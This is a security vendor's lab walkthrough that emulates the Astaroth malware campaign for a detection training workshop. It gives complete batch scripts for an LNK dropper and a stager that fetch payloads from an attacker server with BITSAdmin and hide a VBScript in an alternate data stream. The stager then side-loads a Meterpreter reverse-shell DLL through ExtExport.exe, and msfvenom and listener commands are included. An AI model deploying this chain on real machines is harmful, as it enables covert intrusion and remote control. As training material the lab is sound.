{"id":10574,"date":"2020-07-03T09:00:00","date_gmt":"2020-07-03T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/"},"modified":"2026-05-25T10:34:07","modified_gmt":"2026-05-25T09:34:07","slug":"attack-detection-fundamentals-code-execution-and-persistence-lab-1","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/","title":{"rendered":"Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #1"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals: Code Execution and Persistence &#8211; <span class=\"blue-text\">Lab #1<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                           
                         <span class=\"wp-component-content__meta-category\">\n                                        Offensive security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Threat intelligence                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                03 Juli, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Teilen Sie dies                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20Code%20Execution%20and%20Persistence%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n           
     <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, 
https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_f5e9a53dd2787b985d3a0973fa9b5af4\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 
6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Anartz Martin<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Inhaltliche Navigation            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    W\u00e4hlen Sie einen Abschnitt                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block 
wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20Code%20Execution%20and%20Persistence%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div 
class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the second part of WithSecure Consulting&#x27;s Attack Detection Workshop series, covering Code Execution and Persistence, we explored a number of offensive techniques for achieving code execution and maintaining a foothold within a target environment.<\/p>\n<p>We emulated the TTPs used by Astaroth malware to do this, and saw how living-off-the-land binaries (LOLBins), DLL side-loading and alternate data streams could be put to use by threat actors. We also explored the detection strategies that can be employed to spot these using our own detection stacks. The following blog provides a step-by-step guide to recreating the demos from that Code Execution and Persistence workshop, as well as exercises to further the reader&#x27;s understanding of the concepts shown.<\/p>\n<p>For this first lab we are going to carry out a simplified simulation of a real Astaroth compromise, much like the ones we have detected. Although the flow of the Astaroth malware is a lot more sophisticated and stealthier than what is proposed here, the core techniques will remain the same. Specifically, we are going to focus on the two new techniques the latest iteration of the malware incorporates, explaining how the actors behind the campaign used them to achieve their goals.<\/p>\n<p>In the same manner, we are also going to explain the different ways these techniques can be detected, providing examples of the different tools we can use to do it. The goal of this lab is therefore to provide the reader with basic knowledge of how these attacks occur and how they can be detected.<\/p>\n<p>For better context, an introduction to this campaign and to each of these techniques is provided.<\/p>\n<p>DISCLAIMER: Setup of the tools and the testing environment might not be covered comprehensively within this lab. 
We will assume basic familiarity with Linux\/Windows command line and the ability of the reader to deploy the necessary frameworks. For that, it is recommended to follow the suggested references for the official tutorials and walkthrough published by the framework&#x27;s author.<\/p>\n<h2>References<\/h2>\n<ul>\n<li><a href=\"https:\/\/www.microsoft.com\/security\/blog\/2020\/03\/23\/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable\/\" target=\"_blank\" rel=\"noopener\">Latest Astaroth living-off-the-land attacks are even more invisible but not less observable<\/a><\/li>\n<li><a href=\"https:\/\/lolbas-project.github.io\/\" target=\"_blank\" rel=\"noopener\">LOLBAS &#8211; Living Off The Land Binaries and Scripts (and now also Libraries)<\/a><\/li>\n<li><a href=\"https:\/\/lolbas-project.github.io\/lolbas\/Binaries\/Bitsadmin\/\" target=\"_blank\" rel=\"noopener\">LOLBAS &#8211; Bitsadmin.exe<\/a><\/li>\n<li><a href=\"https:\/\/www.hackingarticles.in\/windows-for-pentester-bitsadmin\/\" target=\"_blank\" rel=\"noopener\">Windows for Pentester: BITSAdmin<\/a><\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/bitsadmin\" target=\"_blank\" rel=\"noopener\">Microsoft Docs &#8211; bitsadmin<\/a><\/li>\n<li><a href=\"https:\/\/lolbas-project.github.io\/lolbas\/Binaries\/Extexport\/\" target=\"_blank\" rel=\"noopener\">LOLBAS &#8211; Extexport.exe<\/a><\/li>\n<li><a href=\"http:\/\/www.hexacorn.com\/blog\/2018\/04\/24\/extexport-yet-another-lolbin\/\" target=\"_blank\" rel=\"noopener\">ExtExport &#8211; yet another LOLBin<\/a><\/li>\n<li><a href=\"https:\/\/oddvar.moe\/2018\/01\/14\/putting-data-in-alternate-data-streams-and-how-to-execute-it\/\" target=\"_blank\" rel=\"noopener\">Putting data in Alternate data streams and how to execute it<\/a><\/li>\n<li><a href=\"https:\/\/gist.github.com\/api0cradle\/cdd2d0d0ec9abb686f0e89306e277b8f\" target=\"_blank\" 
rel=\"noopener\">Execute from Alternate Streams<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1096\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;CK &#8211; NTFS File Attributes<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1073\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;CK &#8211; DLL Side-Loading<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1218\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;CK &#8211; Signed Binary Proxy Execution<\/a><\/li>\n<li><a href=\"https:\/\/www.offensive-security.com\/metasploit-unleashed\/\" target=\"_blank\" rel=\"noopener\">Offensive Security &#8211; Metasploit Unleashed<\/a><\/li>\n<\/ul>\n<h2>Required Tools<\/h2>\n<ul>\n<li>Attacking VM &#8211; <a href=\"https:\/\/www.kali.org\/\" target=\"_blank\" rel=\"noopener\">Kali Linux<\/a><\/li>\n<li>Target VM (Windows with AV and Firewall disabled, on an isolated lab network)<\/li>\n<li>SimpleHTTPServer (Python module)<\/li>\n<li><a href=\"https:\/\/www.metasploit.com\/\" target=\"_blank\" rel=\"noopener\">Metasploit<\/a><\/li>\n<\/ul>\n<h2>Astaroth Malware<\/h2>\n<p>Astaroth is a malware campaign that has always made heavy use of obfuscation, fileless techniques and legitimate system tools (also known as Living-off-the-Land binaries or LOLBins) in order to avoid detection. 
In its latest form, seen first in February and still active, the malware ditched the use of Windows Management Instrumentation Command-line (WMIC) and adopted two new, less common techniques:<\/p>\n<ul>\n<li>Abuse of Alternate Data Streams (ADS)<\/li>\n<li>Abuse of the ExtExport.exe LOLBin<\/li>\n<\/ul>\n<p>Through these techniques, the malware was able to get access to the victim&#x27;s system, deliver the payloads and execute them in an even stealthier manner than in previous campaigns.<\/p>\n<h2>Living-off-the-Land Binaries (LOLBins)<\/h2>\n<p>Living-off-the-Land Binaries or LOLBins is a term for any binaries that are already part of the operating system and that can be abused by malicious actors to perform actions they were not intended to. They are very helpful for attackers for two main reasons:<\/p>\n<ul>\n<li>They can be used as they are, without the need to deliver any new files or modify them.<\/li>\n<li>They provide the perfect way to bypass detection mechanisms.<\/li>\n<\/ul>\n<p>This definition can also be expanded to include libraries and scripts, which are known as LOLBAS (Living-off-the-Land Binaries, Scripts and Libraries), further expanding the toolset readily available to the attacker.<\/p>\n<p>In the lab, as with the real Astaroth malware, we are going to focus on the following two LOLBins.<\/p>\n<h3>BITSAdmin<\/h3>\n<p>The Background Intelligent Transfer Service Admin (or BITSAdmin) is a Windows command-line tool whose main purpose is to manage download and upload jobs, while allowing us to monitor their progress. However, there are many different ways in which this tool can be, and historically has been, abused, with attackers using it for anything from file transfer to code execution. 
Some of these examples are detailed below:<\/p>\n<ul>\n<li>File Download<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">bitsadmin \/transfer &lt;job_name&gt; \/priority &lt;priority&gt; &lt;remote_path&gt; &lt;local_path&gt;<\/code><\/pre>\n<pre><code class=\"language-bash\">bitsadmin \/create 1 bitsadmin \/addfile 1 https:\/\/live.sysinternals.com\/autoruns.exe c:\\data\\playfolder\\autoruns.exe bitsadmin \/RESUME 1 bitsadmin \/complete 1<\/code><\/pre>\n<ul>\n<li>File Copy<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">bitsadmin \/create 1 &amp; bitsadmin \/addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe &amp; bitsadmin \/RESUME 1 &amp; bitsadmin \/Complete 1 &amp; bitsadmin \/reset<\/code><\/pre>\n<ul>\n<li>Code Execution<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">bitsadmin \/create 1 &amp; bitsadmin \/addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe &amp; bitsadmin \/SetNotifyCmdLine 1 c:\\data\\playfolder\\cmd.exe NULL &amp; bitsadmin \/RESUME 1 &amp; bitsadmin \/Reset<\/code><\/pre>\n<ul>\n<li>Persistence<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">bitsadmin \/Create &lt;job_name&gt;\nbitsadmin \/Addfile &lt;job_name&gt; &lt;remote_path&gt; &lt;local_path&gt;\nbitsadmin \/SetNotifyFlags &lt;job_name&gt; 1\nbitsadmin \/SetNotifyCmdLine &lt;job_name&gt; &lt;program_name&gt; [program_parameters]\nbitsadmin \/SetMinRetryDelay &lt;job_name&gt; 30\nbitsadmin \/Resume &lt;job_name&gt;<\/code><\/pre>\n<p>In this lab we are going to use BITSAdmin to transfer the payloads, but I strongly recommend the reader go over the list of references on this walkthrough and explore all its possible uses and tips on how to detect them.<\/p>\n<h3>ExtExport<\/h3>\n<p>ExtExport.exe is a utility that comes bundled with Internet Explorer that looks and loads DLLs with the following names:<\/p>\n<ul>\n<li>mozcrt19.dll<\/li>\n<li>mozsqlite3.dll<\/li>\n<li>sqlite3.dll<\/li>\n<\/ul>\n<p>An attacker can abuse this tool by 
passing it a path (&quot;C:\\test&quot; in the example below) where a malicious DLL is stored.<\/p>\n<pre><code class=\"language-bash\">Extexport.exe c:\\test foo bar<\/code><\/pre>\n<p>ExtExport.exe will then side-load it and the embedded payload will be executed.<\/p>\n<h2>Alternate Data Streams (ADS)<\/h2>\n<p>Alternate Data Streams (ADS) are a property of every entry in the Master File Table (MFT) of NTFS-formatted file systems that can be used to store arbitrary data. When used maliciously, this can be abused as a defense evasion and code execution technique, by hiding complete files from normal methods of detection, and providing the ability to access them at a later time.<\/p>\n<ul>\n<li>Hiding Files in ADS<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">type &lt;filepath&gt; &lt;target_file:ads&gt;<\/code><\/pre>\n<ul>\n<li>Executing Files Stored in ADS<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">&lt;command&gt; &lt;target_file:ads&gt; [arguments]<\/code><\/pre>\n<p>An important thing to note here is that the command to execute the file hidden in the ADS will be different depending on the format of said file.<\/p>\n<p>Unsurprisingly, this technique can also be abused as a means to achieve, or help achieve, persistence.<\/p>\n<h2>Walkthrough<\/h2>\n<h3>1 &#8211; Dropper Creation<\/h3>\n<p>First of all, we need to create a dropper file that will imitate the one users received after clicking on the malicious link in the Astaroth campaign, and that kickstarts the whole compromise process. 
To do this, we are going to write a helper batch file that will use a temporary VBScript to create the final LNK dropper file.<\/p>\n<p>Simply copy the code below to your favourite IDE, give it a .bat extension, move it to the Windows VM and execute it to create the dropper in LNK format.<\/p>\n<pre><code class=\"language-bash\">@echo off\n\nsetlocal enabledelayedexpansion\n\nrem Create a dropper in LNK (shortcut) format that will download and execute the CMD stager.\n\nset SERVER=http:\/\/&lt;attacking_ip&gt;\/\n\nset PATH_PUBLIC_DIR=C:\\Users\\Public\\Libraries\\raw\\\nrem Create the target directoty if it does not exist.\nif not exist &quot;%PATH_PUBLIC_DIR%&quot; mkdir %PATH_PUBLIC_DIR%\n\nset DROPPER_LNK=clickme.lnk\nset STAGER_CMD=stager.cmd\nset DROPPER_LNK_CREATE=dropper_lnk_create.vbs\n\nset URL_STAGER_CMD=%SERVER%%STAGER_CMD%\n\nset PATH_DROPPER_LNK_CREATE=%PATH_PUBLIC_DIR%%DROPPER_LNK_CREATE%\nset PATH_DROPPER_LNK=%PATH_PUBLIC_DIR%%DROPPER_LNK%\nset PATH_STAGER_CMD=%PATH_PUBLIC_DIR%%STAGER_CMD%\n\nrem Use a temporary VBScript to create the LNK dropper.\nrem The LNK dropper will contain code to download, execute and delete the CMD stager.\necho Set oWS = WScript.CreateObject(&quot;WScript.Shell&quot;) &gt; %PATH_DROPPER_LNK_CREATE%\necho sLinkFile = &quot;%PATH_DROPPER_LNK%&quot; &gt;&gt; %PATH_DROPPER_LNK_CREATE%\necho Set oLink = oWS.CreateShortcut(sLinkFile) &gt;&gt; %PATH_DROPPER_LNK_CREATE%\necho oLink.TargetPath = &quot;C:\\Windows\\System32\\cmd.exe&quot; &gt;&gt; %PATH_DROPPER_LNK_CREATE%\necho oLink.Arguments = &quot;\/c bitsadmin \/transfer 1 \/priority FOREGROUND %URL_STAGER_CMD% %PATH_STAGER_CMD% &amp; call %PATH_STAGER_CMD% &amp; del %PATH_STAGER_CMD%&quot; &gt;&gt; %PATH_DROPPER_LNK_CREATE%\necho oLink.Save &gt;&gt; %PATH_DROPPER_LNK_CREATE%\ncscript %PATH_DROPPER_LNK_CREATE%\ndel %PATH_DROPPER_LNK_CREATE%<\/code><\/pre>\n<p>Notably, within this script we can see the construction of our BITSAdmin command using the &quot;\/transfer&quot; 
flag.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/dropper-creation.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>When we execute the dropper, it will connect back to the attacking server, download the stager payload, execute it and delete it.<\/p>\n<p>NOTE: You can discard this batch file after the dropper has been created, as this is not really part of the simulation. Alternatively, you can use any other method you prefer to create the shortcut file.<\/p>\n<h3>2 &#8211; Stager Creation<\/h3>\n<p>Next we are going to write the stager. As mentioned in the introduction this is going to be a simplified simulation of the attack flow of the real threat, but we will still keep the main focus on the usage of LOLBins and Alternate Data Streams as a means of downloading, hiding and executing our payloads.<\/p>\n<p>The code that follows this text downloads the final Meterpreter payload in DLL format using Bitsadmin.<\/p>\n<pre><code class=\"language-bash\">bitsadmin \/transfer &lt;job_name&gt; \/priority FOREGROUND &lt;remote_filename&gt; &lt;local_filename&gt;<\/code><\/pre>\n<p>This payload then gets renamed to one of three DLL names that Extexport looks for (mozcrt19.dll, mozsqlite3.dll or sqlite3.dll) and stored in C:\\Users\\Public\\Libraries\\raw, where the Extexport utility will find it.<\/p>\n<p>For this to happen we need some launcher code first. 
This is going to be generated by a small VBScript that we will drop to disk, then copy into the ADS of desktop.ini and finally delete it, effectively hiding it from unwanted attention.<\/p>\n<pre><code class=\"language-bash\">type &lt;evil_file&gt; &lt;target_file:evil_file&gt; &amp;&amp; erase &lt;evil_file&gt;<\/code><\/pre>\n<p>Now that our newly-created launcher generator script is safely stored, we can execute it to get the launcher file in shortcut format (.lnk).<\/p>\n<pre><code class=\"language-bash\">cscript &lt;target_file:evil_file&gt;<\/code><\/pre>\n<p>This small program will use the Extexport LOLBin, which is a legitimate utility shipped as part of Internet Explorer. The code inside the launcher shortcut looks similar to this:<\/p>\n<pre><code class=\"language-bash\">C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe &lt;target_directory&gt; &lt;foo&gt; &lt;bar&gt;<\/code><\/pre>\n<p>Finally we can execute our launcher code:<\/p>\n<pre><code class=\"language-bash\">start \/b &lt;file&gt;<\/code><\/pre>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/stager-files.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/stager-dir.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>You can find the whole stager code below.<\/p>\n<pre><code class=\"language-bash\">@echo off\n\nsetlocal enabledelayedexpansion\n\nset SERVER=http:\/\/&lt;attacking_ip&gt;\/\n\nset PATH_PUBLIC_DIR=C:\\Users\\Public\\Libraries\\raw\\\nrem Create the target directoty if it does not exist.\nif not exist &quot;%PATH_PUBLIC_DIR%&quot; mkdir %PATH_PUBLIC_DIR%\n\nset PAYLOAD_DLL=payload.dll\nset TARGET_ADS=desktop.ini\nset LAUNCHER_LNK=launcher.lnk\nset LAUNCHER_CREATE_VBS=launcher_create.vbs\n\nset URL_PAYLOAD_DLL=%SERVER%%PAYLOAD_DLL%\n\nrem ExtExport.exe looks for any DLL with the following 
names.\nset EXTEXPORT_DLLS[1]=mozcrt19.dll\nset EXTEXPORT_DLLS[2]=mozsqlite3.dll\nset EXTEXPORT_DLLS[3]=sqlite3.dll\n\nrem Select one DLL filename at random.\nset \/a _rand=%RANDOM% %% 3 + 1\nset EXTEXPORT_DLL=!EXTEXPORT_DLLS[%_rand%]!\n\nset PATH_EXTEXPORT_DLL=%PATH_PUBLIC_DIR%%EXTEXPORT_DLL%\nset PATH_LAUNCHER_LNK=%PATH_PUBLIC_DIR%%LAUNCHER_LNK%\nset PATH_LAUNCHER_CREATE_VBS=%PATH_PUBLIC_DIR%%LAUNCHER_CREATE_VBS%\n\nset PATH_LAUNCHER_CREATE_ADS=%PATH_PUBLIC_DIR%%TARGET_ADS%:%LAUNCHER_CREATE_VBS%\n\nset PATH_EXTEXPORT_EXE=C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe\nset EXTEXPORT_ARGS=C:\\Users\\Public\\Libraries\\raw foo bar\n\nrem Download the renamed DLL payload from the server.\nbitsadmin \/transfer 2 \/priority FOREGROUND %URL_PAYLOAD_DLL% %PATH_EXTEXPORT_DLL%\n\nrem Use a temporary VBScript to create the LNK launcher.\nrem The launcher will take the renamed DLL payload and load it using ExtExport.\necho Set oWS = WScript.CreateObject(&quot;WScript.Shell&quot;) &gt; %PATH_LAUNCHER_CREATE_VBS%\necho sLinkFile = &quot;%PATH_LAUNCHER_LNK%&quot; &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho Set oLink = oWS.CreateShortcut(sLinkFile) &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho oLink.TargetPath = &quot;%PATH_EXTEXPORT_EXE%&quot; &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho oLink.Arguments = &quot;%EXTEXPORT_ARGS%&quot; &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho oLink.Save &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\n\nrem Copy the launcher creation VBScript to the Alternate Data Stream (ADS) of desktop.ini and erase it.\ntype %PATH_LAUNCHER_CREATE_VBS% &gt; %PATH_LAUNCHER_CREATE_ADS% &amp;&amp; erase %PATH_LAUNCHER_CREATE_VBS%\n\nrem Execute the launcher creation VBScript from the Alternate Data Stream (ADS).\ncscript %PATH_LAUNCHER_CREATE_ADS%\n\nrem Execute the LNK launcher. 
This will use ExtExport.exe to side load and execute the DLL payload.\nstart \/b %PATH_LAUNCHER_LNK%<\/code><\/pre>\n<p>This file needs to be stored on your attacking VM in the same folder from which we are going to start our server. When we execute the dropper created in the previous step, this file will be fetched, executed and then deleted.<\/p>\n<p>NOTE: In the second lab we are going to modify this script to achieve persistence by adding this launcher in .lnk format to the StartUp folder.<\/p>\n<h3>3 &#8211; Payload Generation<\/h3>\n<p>In order to generate the malicious DLL file that Extexport will import, we will use msfvenom, a utility of the Metasploit framework used to generate payloads in different formats and for multiple platforms.<\/p>\n<p>To create the payload, enter the following command:<\/p>\n<pre><code class=\"language-bash\">msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=&lt;attacking_ip&gt; LPORT=4444 -f dll -o payload.dll<\/code><\/pre>\n<p>Breakdown of the command:<\/p>\n<ul>\n<li>-p windows\/meterpreter\/reverse_tcp &#8211; Tells msfvenom to generate a payload that will be suitable for the listener configured in step 5 below. 
This value needs to correspond to the one configured in the exploit\/multi\/handler within Metasploit.<\/li>\n<li>LHOST=&lt;OUR_IP&gt; &#8211; This will configure the IP address where the payload will connect back to.<\/li>\n<li>LPORT=4444 &#8211; This will set up the listening port.<\/li>\n<li>-f dll &#8211; This generates a payload in the DLL format.<\/li>\n<li>-o payload.dll &#8211; will write the payload into a file called payload.dll.<\/li>\n<\/ul>\n<p>If everything worked as expected, you should see something like this:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/msfvenom-dll-payload.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The name of the payload will be later renamed to one of the Extexport DLLs when we copy it to the target machine, as explained in the previous step.<\/p>\n<h3>4 &#8211; Server Setup<\/h3>\n<p>We are going to make use of the SimpleHTTPServer Python module to quickly spin up a HTTP server that will serve our newly-created stager and payload. 
In the Operation Cobalt Kitty lab in the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-3\/\" target=\"_blank\" rel=\"noopener\">first workshop<\/a>, we used Cobalt Strike&#x27;s web server to achieve this, here SimpleHTTPServer achieves the same thing.<\/p>\n<p>Change to the same directory where our payloads are stored and execute the following command:<\/p>\n<pre><code class=\"language-bash\"># python 2.X\npython -m SimpleHTTPServer 80\n\n# python 3.X\npython -m http.server 80<\/code><\/pre>\n<p>This will spin up our web server, and any file in that directory will be accessible by performing a request in the following format:<\/p>\n<pre><code class=\"language-bash\">http:\/\/&lt;server_ip&gt;\/&lt;requested_ file&gt;<\/code><\/pre>\n<h3>5 &#8211; Listener Setup<\/h3>\n<p>To set up the C2 server that will receive the reverse connection from our payload, we will use the Metasploit Framework. Installation and setup of the framework is outside of the scope of this lab and is therefore left as an exercise for the reader.<\/p>\n<p>Start the Metasploit console and configure what, in Metasploit terminology, is known as a &quot;handler&quot;:<\/p>\n<pre><code class=\"language-bash\">msfconsole\nuse exploit\/multi\/handler<\/code><\/pre>\n<p>This will bring you to the handler configuration. 
